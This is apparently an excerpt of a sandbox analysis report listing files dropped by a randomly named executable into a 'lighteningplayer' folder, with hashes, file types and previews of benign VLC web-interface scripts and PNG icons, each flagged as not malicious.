Preview: <script type="text/javascript">..//<![CDATA[...$(function(){....$('#window_offset').dialog({.....autoOpen: false,.....minWidth: 400,.....buttons:{......"Close":function(){.......$(this).dialog("close");......}.....}....});....$( "#rateSlider" ).slider({.....range: "min",.....value: 1,.....min: 0.25,.....max: 10,.....step: 0.25,.....stop: function( event, ui ) {......sendCommand({.......'command':'rate',.......'val':(ui.value)......}).....},.....slide: function(event,ui){......$('#currentRate').empty();......$('#currentRate').append(ui.value+'x');.....}....});....$( "#audioSlider" ).slider({.....range: "min",.....value: 0,.....min: -10,.....max: 10,.....step: 0.25,.....stop: function( event, ui ) {......sendCommand({.......'command':'audiodelay',.......'val':(ui.value)......}).....},.....slide: function(event,ui){......$('#currentAudioDelay').empty();......$('#currentAudioDelay').append(ui.value+'s');.....}....});....$( "#subtitleSlider" ).slider({.....range: "min",.....value: 0,.....mi
C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:HTML document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1300
Entropy (8bit):5.174950869624417
Encrypted:false
SSDEEP:24:L0wQxOxUl1ILlDlezVh4WUNDRILCwbYMPljLSvkjwKHE3YfHD0y:YxD6lDleT4dNDR6JdjW0MYV
MD5:553C71D52DE92810BF4AFA6E655B5D19
SHA1:2F434F7BF9E3A8A40BFA7151FE18F516E02BE90D
SHA-256:57491AA7D11E810E8BCE4EB47B0227FF672304076CC88AEFDCF30AF5B05C9368
SHA-512:601F8095945FD6ED5E81BCF58FB805EF87ECC1A9A8F15830CE608DC796DFD0E8420169D0ECDA4A0A2C74D49855E539EDE74DB95D5EA8D25F173CDF1C0481C796
Malicious:false
Preview: <script type="text/javascript">...$(function(){....$('#window_stream_config').dialog({.....autoOpen: false,.....width:400,.....modal: true,.....buttons:{......"<?vlc gettext("Okay") ?>":function(){.......$('#player').empty();.......$('#player').attr('href',$('#stream_protocol').val()+'://'+$('#stream_host').val()+':'+$('#stream_port').val()+'/'+$('#stream_file').val());.......flowplayer("player", "http://releases.flowplayer.org/swf/flowplayer-3.2.7.swf");.......$(this).dialog('close');......},......"<?vlc gettext("Cancel") ?>":function(){.......$(this).dialog('close');......}.....}....});...})..</script>..<div id="window_stream_config" title="<?vlc gettext("Stream Input Configuration") ?>">...<table>....<tr>.....<td><?vlc gettext("Protocol") ?></td>.....<td><input type="text" name="stream_protocol" id="stream_protocol" value="http" /></td>....</tr>....<tr>.....<td><?vlc gettext("Host") ?></td>.....<td><input type="text" name="stream_host" id="stream_host" value="" /></td>....</tr>....<
C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_window.html
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:HTML document, ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):4252
Entropy (8bit):5.1855781919952015
Encrypted:false
SSDEEP:96:I3cQXljXrc1tXrc7XrVkXrSwzZb0hLEOXrHTBXrKjXrr1TwXrXi9XKK0Z:WcY1XraXrSXrqXrJghL1XrHtXr8XrrNs
MD5:042337F0F4A68CE50BFF9BB174F1F148
SHA1:DEDB805EC6B0DDAB566AD49AC44D75CD2FCE676B
SHA-256:B103C0D7778D1694FDCAB3AA28DE6EE80AA9A10288355D2F47EE9ECF8A2462E6
SHA-512:F906F16EEBF05378668EF3B472631AF90178F469F3453727C95552091A0EF95D3C72C41BEA6887BBBCD07B5781FE8D4244FC78E941B7A95ABE0EB2287E12F14C
Malicious:false
Preview: <script type="text/javascript">..//<![CDATA[...var stream_server..=.window.location.hostname;...function configureStreamWindow(stream_protocol,stream_server,stream_port,stream_file){....$('#stream_protocol').val(stream_protocol);....$('#stream_host').val(stream_server);....$('#stream_port').val(stream_port);....$('#stream_file').val(stream_file);...}...$(function(){....$('#window_streams').dialog({.....autoOpen: false,.....minWidth: 600,.....minHeight: 430,.....buttons:{......"<?vlc gettext("Close") ?>":function(){.......$(this).dialog("close");......}.....}....});....$('#window_stream_config').dialog({.....autoOpen: false,.....width:400,.....modal: true,.....buttons:{......"<?vlc gettext("Okay") ?>":function(){.......$(this).dialog('close');......}.....}....});....$('#button_create_stream').click(function(){.....$('#window_create_stream').dialog('open');.....return false;....});....$('#button_clear_streams').click(function(){.....sendVLMCmd('del all');.....return false;....});....$('#
C:\Program Files (x86)\lighteningplayer\lua\http\favicon.ico
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:MS Windows icon resource - 6 icons, 32x32, 8 bits/pixel, 16x16, 8 bits/pixel
Category:dropped
Size (bytes):86358
Entropy (8bit):3.516013150576034
Encrypted:false
SSDEEP:1536:6gEX6YaSd4Psq0PXpmWu79B1ArPUco9FLdS1EAd4kkVIIOQSOZ:CraBIpPQMPozgEAQIIOI
MD5:6F7E92FE7E6A62661AC2B41528A78FC6
SHA1:2353AFB5C229987DF63696FB48BDF840AA208791
SHA-256:FD9B5998B98EE0BA86ED7687F215A1CDDE90C00B0B1CD11DC83E3614389CB6AD
SHA-512:E173D8937EA262CEE649C4108503C24159E39C00CB4A89C2E50C6E0FF0CDEEAA6B765E53B98027315E0CDE71C14694486BDCDA0B37B0F1AA2CA24E2A5099DB28
Malicious:false
C:\Program Files (x86)\lighteningplayer\lua\http\images\Audio-48.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):4675
Entropy (8bit):7.930778622036407
Encrypted:false
SSDEEP:96:kRnJQYR5hMutwkgil3D/NhFFFVJu6N/jBdRCPq:QniI5Sutr1lz/DFPVU6VjnRT
MD5:1C068F2B9B854DD4D8E71DF78482BD93
SHA1:779408823553A29F963FFD465AAC2B3EF3167A90
SHA-256:372B03407E4C070AAF05D9BCF70BC048A2560593B7D3E4C919EDA602C1CB5D0B
SHA-512:768B5A064E356584AEBC58EBC6C748FBAB15A070EC1A91DF803424954689EEF5DB8902F16392B1AE621A3677AEE717B2AADC08DD1725DDF620F655BC39374228
Malicious:false
C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2025
Entropy (8bit):7.883325871296714
Encrypted:false
SSDEEP:48:xt5upIu6Ozh5ea7/lf/g5pw8kqZOcjw4cLiMgCkZsjHxaEZSwz2j5na:xd0B7/Rmw0vw4cftJsIhzq8
MD5:90E1C78DC357DBB709A8E51018A4FD9E
SHA1:A289F86F632B083F2D23D5096377C79B75CCD347
SHA-256:E92C787DF1D4C93EA84BFCE7CF61448DCA2879C4C2B9A9D8AD1E8C80F4001AC8
SHA-512:825945EE3935A15D63944A4325D7186D0EA8BA21F3C02580AFF87819EDCB2C7A53AB950A1115D42BB606E56680F3A89FFC217B67B708C226B3EEF806A2214694
Malicious:false
C:\Program Files (x86)\lighteningplayer\lua\http\images\Folder-48.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):1353
Entropy (8bit):7.803487570553727
Encrypted:false
SSDEEP:24:yoJG9dkZJr/F8+TJLdgH17+3vifhVZZ6JOCO0omxCKTnQhQQ/MXaJt:yo467/TJLdgH17+3cZZazboIdbtqt
MD5:4743F4B1508D6E2885CB3E2AB1587629
SHA1:533CA01C16863F92B91F60B07BCC33ADCDE4C973
SHA-256:A5A4ED70D20CEFE54E541E15BC007A6D36339FB6B8428806F7B48F846E8B9160
SHA-512:996FE7B228F385FC16F77F612F66A351BAE9A5FD3CCA3E7B6D6029C925DADA687DF6E106E37E3FF4434F6BE54EE896160BB77A591284DB8F7E20F315E97A2ABA
Malicious:false
C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2921
Entropy (8bit):7.917748891185905
Encrypted:false
SSDEEP:48:nRZq+l/2n+vSiIdsQ3GoqKDNBwc7rh62ChYDZ5DrR8+t4rvr9GyTPm9V34fK2v:RZfl9vdI2Q3GFKD/p7rIjh+JrRntuUyd
MD5:C060535924E3D9806695FE92AB0BF49C
SHA1:80A2DE9DF9369253ECF7C1118D6E1D02384F1BA0
SHA-256:48878E2D1D5DCBD686358A180379D61F82AAF862FA2C4030933C1AD4E7299A20
SHA-512:99E49C459C2A905EC296FB6DC6551151CDBB2AC387E9789455AB403BE38489F1C7BDCC624B2FF2DD69E3C0FE45795391126FD7E40BA2521093C1978D45FC8419
Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...0...0.....W......0IDATh..Y..W.?wf<~{....z...z.x.T-Q... >.".....B?..T$Z....)BB... Uj...!."R.(.$i^%.m.6..>....1....3s...H@%&..3.c....;.s.5.,.>..........Q..).v..o..c....OX8[.........o.T.|r...|...?....8...+...?.........o.b....#.l.9.....cc;z.1.4=cM...kS.k....7{.....P..x<.x...{w.....Li...766..(....`...G...Z....4.+{.6X.$@Y.g..."..31M.j.V.. .......0t.........AY.;....,.d`yls#.].GG.f.39..s.["....DyT.C.....J. .H......<Y........-....Z..%.#"..6t.gB"........P.....t.....H....~..F...g....kF'./'.k...........(.Z..j..1...G1..l..r...6...H..7.. ).C7+.1...w.W.............@&....rI....s.a@?..t.._.4zG*....?.Q.It.qY.4U..R.......v.P(..q$....m.F...Z0....).T.D^8.M@..(....)Io.....dR.Lf*..O......t..n....jSq@]....S$.....&....=..`..(.).~_>?.P.k....f3......@E..RI.e...L.).;........<=R........\8...v.0_....6.^.TE...`.Cn...r.(L.....p<..N.cv&.(e...FNV#77l........yP.....L.[.n....ES...|.d@...p.....y.u.......S..9..{...........,NMkH.$Q....PRS.,.m..|.h..*...*..)G.W#.v.
C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):5115
Entropy (8bit):7.949408664568695
Encrypted:false
SSDEEP:96:FNqlZ7xK/Vw/nEbssJRv0OePeEVxdU0pNOT+cujz+oeiWKoyj6CkMPC:Y9OVw/nzssx60GBmz+xNKBjdq
MD5:E0D1A6C8778E2839EFF8203139673DF0
SHA1:82E0EEBFEFD8D0F66F38CE6338FD353DB5AEF0B2
SHA-256:AA6039A0466683C195E0D2C4B4BF8602BD2173E955BC8DD39CA793D207985A3A
SHA-512:B23933BB91C817CD2AEA70B7E171367A748F4C25CFEC4576F98F844EE49F47F1EBADAD399B5AEFD9F9DF492E67322FB130FBCE74C0A0870F37C22F40F503BCBF
Malicious:false
Preview: .PNG........IHDR...0...0.....W.......IDATh..Z..T../]{WU...F..(.a..@0....Q3..MFG0x<:.!.93j2n!..(..1.H.E..Pd.7.7...........p..=3...Iy..U.....~....TH....K...0.!.L"..A.T....7.t..............O...vt.D"!....w.,j...G%.T~..5.x<...u<.....b...y..}.......%..j.?....l6.D.^.y.y.p../............A.....wa.0.GnZZ.......Dv...ACe.5...&.....dr...RSS....x.....h4....w.J...xF.477.....xpp...mmm.9f..h._.7B. .{-.u.....Vk..l~....+.~/.......2f.dx....b6....a...hmm.N.CJJ........_.A0........ 0....C8.F^^.#..."[.d.8.. ~.C..$YLQQ.....u..).x.....z.%....h>s.=}......'a\^..0........%...).....q.x.}.CaL.x"223.@...kc......../G{{.|.W....f..m.....s....N.5........._...G.))?9|...:.QUU.I.&..ta...P^Z...}../.u......]w.bD....UW..........3...Y.E[;.n..7~..g...R4....^I....@sC...v......q...%K..0u..jF.).p.UYY)`2?...v~.[.i..g...h..NK..{....#....9s.H...D.H.<..d.X..[.....~i.m...D.H...{..q....E\XPP*.8.%.]..#.....n....--..'V.eM.7."d.m...@".x,......`....._.......&...9.,&9z.o.>..:d....,n...c.O.Y)D
C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 672 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):11954
Entropy (8bit):7.941224336803605
Encrypted:false
SSDEEP:192:bSpfvEkUnAU6qLspUU2q2Yvbk8NepdGj8zD9Ty8ynNWEnsxqI5yT6FNSgOTTjGQ:ON763YpG0o8NAIjw6nsxVeMNSgON
MD5:6F26868BA019D0C63E0F6F75EF455646
SHA1:25396F2CD88001FEE9AA40758D37433352A12F0A
SHA-256:C3904F63906DB4346D2E0529285397C0CED3DBD5132DBA250C3FCB28ED6A96DF
SHA-512:00DAD8BD1827299493C2B800206C884F54026413B59B9004F2AC3FC7DE4DBFF2DD91B91E4F018EB9F051D1ACF23646D8F6BC1DB70B4A751B2C529AC504F8ACFA
Malicious:false
Preview: .PNG........IHDR.......0............sRGB.........bKGD..............pHYs.................tIME.....:..k.L...2IDATx..].t.E.F.g.QP.a..eW..5a.!.I.B..K..D.E...YB...E..A..l".SQ..P@.P.....q..<.9....t?:/._.K...:......n.]...:..:..:..:..:..:..:..:..:..:..........3*....:..:...4dv.Z.[w6.,q.9..5.U:`..K..r........:.#....]......]i]2V.......m..e..........A._..$.I.+.............K..5.p.....k...._..gtu.Q..../z...\...'.C..k{e....c#y........U..s.i.....<...>I3sf..c8.w..;tZ..%=)#...2...!.w....~6..?[..?.......?"..K..5.0.|....._...5.R._.]...D....l....6.........G.^..;..pi..%...k..E.y..q...@..3..e.......x.<p. .9j4..?...%.x{.w...c.k.e8"....'.I..g.~..g.~..g.?.~..y... ./...".....eu.C.C..h........w...!........#.zF..4h.<.o.<`.B.;m!gO.....G]'...q..y.,j?r&'.....Q.Op..).r.d..o"7.?......]..).cZ.dS......q@{..]>9..R..........J.......3....J...I.K.%.......(..;z<.?.~.t.~.(.+..,..s*....QA._...E...%O..f.K......5~._....._.Y.:...V.^....y....'M.w.&.=Ic.|I..u...q
C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):942
Entropy (8bit):7.707652841230822
Encrypted:false
SSDEEP:24:KsMWnsDBThvfQrA13Lfsq9/tArO6NXpWe7xs6K:TMWnsDBThv1ZnO9R5i6K
MD5:C9D3C069A660E0AE1DC8DA905C8D8C4B
SHA1:A4F202528D7D36569448FDDB2CF32CBC63C798B5
SHA-256:3C6CF8B87AD6453BF0D0629893CBE4D0196A3B28E9036B7CC6F19C0168325137
SHA-512:7066EBB6B086759C5F3991B034097E92201ED5B640A20A3F2DD591462243E181BD685CCFAA7E6DCBB7F4355B45340D53B665B575CC1FE82C2EE10228A145CB2B
Malicious:false
Preview: .PNG........IHDR... ... .....szz....uIDATX..W.O.Q.....-...m)......k".@..4...W../z..M....A...x.X..x..$p.....v...]..@.Bi_UJL.d.}..|o.7S..r..H$....>..x<...w.,{..n..x:..........4..v. .-...S....%..hpp....M.1..LFp..a.Om.............MD..4."y.K. .(...i...d..2.e.Z....Vmv...v.w9...<..x.{.....j.....Je+.L>b.s..R6.},..@ ...a..H.9...rea.aO!...dE!..H...{..#..D..."wr......^...NE.X(.b.V...L.X....P"..C.I.....(..o.N.yc..@8...p.$Qj....`..!.hll.;.hM..q].$i.C>..X..NO.,.-...`a.|.R.q...9.........C...`8).A.?.)X<.V.Rj<...B..B..R4.....u.e.%.F..~.H.....`..Ad.&Y..........pb.e.Z.F..]..\.*.2Y...........]>-.......D."..pe..i...`......D.Ml.......*Vz...W.....=./. ..U+B...lK....R..k'&N.m.M..22...........b..........>..fls.8".ib.\.^...M.g...K1j......O..a,.y.E.'QI..^.......F...H..+(F....X4..c.....@A.>.VC./...y.z.!A...j.T.y.x.u.NO.s.....4.hD.T...`P.H...+F...G>..... _.......t.`dd....F4.I.#.Q...@.7..._..J~..)....Z\....IEND.B`.
C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):15875
Entropy (8bit):7.973702300459294
Encrypted:false
SSDEEP:384:Ru2xCGZC+RcEmg3qfQ2lWI57+5ne5ipqOoYW9fu:7wGZC+yEmfIs/g9pqvYWtu
MD5:4BC61FC36DFE84F904218699C1E6C6DA
SHA1:E61EB558E07C26CB8ACD78C9E4F5A9BA58565D4A
SHA-256:731D5A34A98FEE76F9E1AACAA524B3E0ED0CF0ECAC3E2F9E2703B38C4A4BC518
SHA-512:A11F54209A9F3367D22ACEAE3568C1672B67C6192ADD4C59772EBCE6503B6ABFBB9E2BA79C16DC60991471A466B2A2014BB634C336C69A96F3E9CB7F9E48917B
Malicious:false
Preview: .PNG........IHDR..............>a...=.IDATx..}g.\.u.y.sO....0........v%.. ......r.%..V.TeW..T.K.r.d.T.T4..?..T..(Q..R..E..i2&..L....9...}...,.0....=....=.;....1...{..S.].w..-.}....tM..AQ.`....?.d.6TJ9.6.Cqu....A.&.1{.|AI.a.......t8,.Zb....^....6Hr......&{....P.Z_......{..~o.!...JJ.4X......+.d........9....1..N?H...aI.$Xf.Q...t.3.+......<.!..(...$+.6;..Rma.......a..`.h..}..4.d.o..%....e....[.0* ...~o}C.*:...w....m...qH...S_.I2......9...e..X....:...H_I.$c.t.W....T..G._.;...c......Lt...._....:.R.=^..8.......>...2xC."......td..G...|...R.O.G8..wG.....aO.......d..#.c$t...\*.. .{.J ....z..>.ZY..C..G5.... .f'.(.N..3.O.h>.R.....z.Y..K..H..8.(....2.._..N.Z[n>.a..V.Z.P....g..I.,VZ.l..P.j/2..'.g....k.P....@..0..|.SF).y..H........"..E.s..?4w;W.)t.mZ.~..Q..7.9r...=N.@..1C.s.'..LJH]......?.Z.B....Pz..=..x..1......&....?.....#.k...g.P...x......G_*I..Q....b.R.H.#H......!..=.P........?&+.+.Z|W.j.m.<.....w.b..Kl .q.'l.t..>...K..$.!/.fJ.aL.UM.<jQ......R.......(.Ke.R.|
C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):606
Entropy (8bit):7.567318743599164
Encrypted:false
SSDEEP:12:6v/7B8y21ceRnIuKz2J494gVGLiZQrQc3Fx4T7jgrz:E8Mud49PVGLi6UYMT7jgP
MD5:28219046AA007A04696D0DE017BC7691
SHA1:5208AB4FE4FB80EA154B4DD4AFC6BC59EEC34044
SHA-256:32030A3D8E8FA75BD89EAD94C429F2C3418944D9AA3D1029294B4AF99264F5C5
SHA-512:CC165721FD0430532A3F838C8DE8E83BD7501B1E889A0003A979EE81890C67632522AF779CA0A63A854B370838C5BF792BE0F7ADA82E77E629C523220B1EEB4D
Malicious:false
Preview: .PNG........IHDR................a...%IDAT8O..MH....._...F.?.E.Q....... ..7[...Ck[.X.,.L...e.)....c9.:'Y.l.4.\.9...>]d..m...y...Z(..u...h.....>!..pd.....$.;qg....P.2.q.O...O^8.=Pit...*%[g..|...{..}..L.\.3..\.>G}.>Z..6.R..g....h>..U@..."R.?....*&.....C4.@...3RBPB0....6&..(.[..E.Q.]_..%6.....N..[..S..<u.8...7.mVt.9..c.......j.+.J.7u.M............B.\K....C...a.......K.*.g.....+i.....).wY.}f2z.r.k.....}.....:..hLO.i.aP.......$1,_5.O.. .O..r.>....& t...&....s........(.2..G*..rB....'.y.@.!( L....p!.0[K.q^K....;d02....3@.|.....4.e.6.hg.[jE.0.f.ve..........". .....IEND.B`.
C:\Program Files (x86)\lighteningplayer\lua\http\index.html
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):14198
Entropy (8bit):5.29971961065969
Encrypted:false
SSDEEP:384:U+HKKXP1aA032NiAnWStiKruUnfpNdypPmF6s92BEiu/Jh:U+HKKXP1aAuST00/3
MD5:4C2A90D98707DD34894A208B8C335FB5
SHA1:B728A97174126D5CD8E8E955548DE3F6FC476204
SHA-256:A63394CF98836A0616FBBBDA0C60E7BEEFA4490126C427C9B22E2B1820173DBD
SHA-512:40C698EDB4CECD8C0279BA9EECA36C5788F55E84E7DFE169DB2860ECA995DEA2A71575D41E09B00D65309D6499ABFF5269E4E29EA3CBE73F72B2B39072BE9B7E
Malicious:false
Preview: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">.. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< index.html: VLC media player web interface - VLM..< - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >..< Copyright (C) 2005-2014 VLC authors and VideoLAN..< $Id$..<..< Authors: Brandon Brooks <bwbrooks -at- archmageinc -dot- com>..<..< This program is free software; you can redistribute it and/or modify..< it under the terms of the GNU General Public License as published by..< the Free Software Foundation; either version 2 of the License, or..< (at your option) any later version...<..< This program is distributed in the hope that it will be useful,..< but WITHOUT ANY WARRANTY; without even the implied warranty of..< MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the..< GNU General Public License for more details...<..< You should have received a copy of the GNU Ge
C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):5195
Entropy (8bit):5.1368738862657395
Encrypted:false
SSDEEP:96:dsCejmDgHdEf7TbFILjW2fd+dla+KYrtJxto5lGDWtVARrV74ErE5EfP01Z2mp:lBCdEf7TbFIv1fd+dllKYrtlo5lurVcz
MD5:B6A6845D1F74559C55A83040C9426939
SHA1:CA0BE71F319959342CB161ACA0E280950FA17F63
SHA-256:47CAD1DBDE4AD4D5EEE0A7306C7E20DF3F2A080A986CAC5693C50B8FF1434B27
SHA-512:FBAB1598ED06590F5DFDCFAA1F76C14DA5D3D0E517A21F43D186509E9107515310F07DD41F1FE6E7979C7B841CBA55962EF8DA765E5B56B941326F9BE5A1A0EB
Malicious:false
Preview: var intv = 0;..var ccmd = "";..var video_types = [.. "asf", "avi", "bik", "bin", "divx", "drc", "dv", "f4v", "flv", "gxf", "iso",.. "m1v", "m2v", "m2t", "m2ts", "m4v", "mkv", "mov",.. "mp2", "mp4", "mpeg", "mpeg1",.. "mpeg2", "mpeg4", "mpg", "mts", "mtv", "mxf", "mxg", "nuv",.. "ogg", "ogm", "ogv", "ogx", "ps",.. "rec", "rm", "rmvb", "rpl", "thp", "ts", "txd", "vob", "wmv", "xesc" ];..var audio_types = [.. "3ga", "a52", "aac", "ac3", "ape", "awb", "dts", "flac", "it",.. "m4a", "m4p", "mka", "mlp", "mod", "mp1", "mp2", "mp3",.. "oga", "ogg", "oma", "s3m", "spx", "thd", "tta",.. "wav", "wma", "wv", "xm"..];..var playlist_types = [.. "asx", "b4s", "cue", "ifo", "m3u", "m3u8", "pls", "ram", "rar",.. "sdp", "vlc", "xspf", "zip", "conf"..];....var stream_server = window.location.hostname;....function format_time(s) {.. var hours = Math.floor(s / 3600);.. var minutes = Math.floor((s / 6
C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js
Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):23980
Entropy (8bit):4.31324933873002
Encrypted:false
SSDEEP:192:V5jsO7zZGzqPec9x/h8Duxud79RtEZRtykbcJJznPeJdHsEyET+v55:dGlc9x/h8Duwd7H1JJaJdHsEpT+v55
MD5:6DF272C965A86E52FB88145DCE2C6394
SHA1:E940E2E7FD22B3B6CC6F0D10E1C9EDC97C23C158
SHA-256:CDFD0EEEE6A015D28F60B68C7C9F4F49461F40CC16508AE90EF526D918E5E3B3
SHA-512:4EE96D6B0EF6992D56E196D906854E3E38B8C340B41512E235DBCE817B30F7E3B0FDBE6D59DCE131079705B5521B1BA6DDA4C040E650489B2FA06CA8C565DC72
Malicious:false
Preview: var currentArt = null;..var current_que = 'main';..var current_playlist_id = -1;..var previous_playlist_id = -1;....function updateArt(url) {.. $('#albumArt').fadeOut(500, function () {.. $(this).addClass('hidden').removeAttr('height').removeAttr('width').attr('src', url);.. });..}....function updateStatus() {.. $.ajax({.. url: 'requests/status.xml',.. success: function (data, status, jqXHR) {.. if (current_que == 'main') {.. $('.dynamic').empty();.. $('#mediaTitle').append($('[name="filename"]', data).text());.. $('#totalTime').append(format_time($('length', data).text()));.. $('#currentTime').append(format_time($('time', data).text()));.. if (!$('#seekSlider').data('clicked')) {.. $('#seekSlider').slider({.. value: toFloat($('position', data).text()) * 100.. });.. }.. $('#currentV
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\js\jquery.jstree.js
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):184460
                                                                                                                                                                                      Entropy (8bit):5.113633243942571
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Fvjw57nI+7XpvJSwaLG6SDvG76od804VUeEKSO2KWLXd8ZF5DypcyvoZJ4NPwWA3:FvU51SKLVU9KSU8XODQRvn5w9D4R398
                                                                                                                                                                                      MD5:F40F5C163A208E32B2D0E189D5774E7E
                                                                                                                                                                                      SHA1:46AE8556AC9C6272761548A32C8F8F2383B919B8
                                                                                                                                                                                      SHA-256:1A352E095A65F22AF44DBE91E79B2FC21989CC53C7CECB157312184F44F7B5DE
                                                                                                                                                                                      SHA-512:EA0B2FED151E37B403AD4AA44F70378027934EC3566F4A0A80FBED73851FFA9850B3101730A58C2D36FFB0CBCB3FAC950058B9CAE63D2EF5B11890B8E94CB6EC
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: /*.. * jsTree 1.0-rc3.. * http://jstree.com/.. *.. * Copyright (c) 2010 Ivan Bozhanov (vakata.com).. *.. * Licensed same as jquery - under the terms of either the MIT License or the GPL Version 2 License.. * http://www.opensource.org/licenses/mit-license.php.. * http://www.gnu.org/licenses/gpl.html.. *.. * $Date: 2011-02-09 01:17:14 +0200 (.., 09 .... 2011) $.. * $Revision: 236 $.. */..../*jslint browser: true, onevar: true, undef: true, bitwise: true, strict: true */../*global window : false, clearInterval: false, clearTimeout: false, document: false, setInterval: false, setTimeout: false, jQuery: false, navigator: false, XSLTProcessor: false, DOMParser: false, XMLSerializer: false*/...."use strict";....// top wrapper to prevent multiple inclusion (is this OK?)..(function () { if(jQuery && jQuery.jstree) { return; }...var is_ie6 = false, is_ie7 = false, is_ff2 = false;..../* .. * jsTree core.. */..(function ($) {...// Common functions not related to jsTree ...// decided to m
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\js\ui.js
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4044
                                                                                                                                                                                      Entropy (8bit):4.398172546078367
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:50cgIjnyj0pBMUsMsQSMS3xRY2Q8K5Q8eSkz64IUAtFCmW05u4ilWlrhWdCv10lF:5ZRWiIZePmTzt3MTEIrhWdCv6lSk
                                                                                                                                                                                      MD5:6A465D7CD488589803B338702E6EB17A
                                                                                                                                                                                      SHA1:D7677FCBA7199E24D166DF165809E7C479C069DD
                                                                                                                                                                                      SHA-256:94032A9C52559E21F0201284902C4B9B04D7605E665C750327DB9ABAEF71E544
                                                                                                                                                                                      SHA-512:EA3C287A801BB1137C60FFBEBE160A1047E42CFD8FD694DA241E645216D60F26A809BF9087748BB037AF880B6DD88F6CA05C2A84D9CC6F9A70B40F188D3787ED
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: $(function () {.. $("#seekSlider").slider({.. range: "min",.. value: 0,.. min: 0,.. max: 100,.. start: function (event, ui) {.. $("#seekSlider").data( 'clicked', true );.. },.. stop: function (event, ui) {.. $("#currentTime").empty().append(format_time(Math.round((ui.value / 100) * $('#seekSlider').attr('totalLength'))));.. switch (current_que) {.. case 'main':.. sendCommand({.. 'command': 'seek',.. 'val': (ui.value) + '%'.. });.. break;.. case 'stream':.. sendVLMCmd('control Current seek ' + ui.value);.. break;.. }.. $("#seekSlider").data( 'clicked', false );.. }.. });.. $("#volumeSlider").slider({.. range: "min",.. value: 50,.. min: 0,.. max: 100,.. start: function (event, ui) {.. $("#vol
                                                                                                                                                                                      C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html
                                                                                                                                                                                      Process:C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe
                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
